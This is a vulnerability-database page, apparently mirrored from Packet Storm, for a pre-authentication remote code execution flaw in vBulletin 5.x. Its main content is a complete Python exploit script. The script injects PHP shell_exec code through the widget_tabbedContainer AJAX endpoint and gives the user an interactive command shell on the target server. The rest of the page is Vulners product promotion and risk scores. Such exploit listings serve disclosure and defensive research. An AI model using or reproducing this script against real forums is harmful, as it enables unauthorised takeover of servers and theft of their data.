Lucene search
K

vBulletin 5.x Remote Code Execution

🗓️ 11 Aug 2020 00:00:00Reported by ZenofexType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 294 Views

vBulletin 5.x Remote Code Execution with Python Exploi

Related
Code
`#!/usr/bin/env python3  
# vBulletin 5.x pre-auth widget_tabbedContainer RCE exploit by @zenofex  
  
import argparse  
import requests  
import sys  
  
def run_exploit(vb_loc, shell_cmd):  
post_data = {'subWidgets[0][template]' : 'widget_php',  
'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd  
}  
r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)  
return r.text  
  
ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')  
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')  
ARGS = ap.parse_args()  
  
while True:  
try:  
cmd = input("vBulletin5$ ")  
print(run_exploit(ARGS.location, cmd))  
except KeyboardInterrupt:  
sys.exit("\nClosing shell...")  
except Exception as e:  
sys.exit(str(e))  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Aug 2020 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.99728
294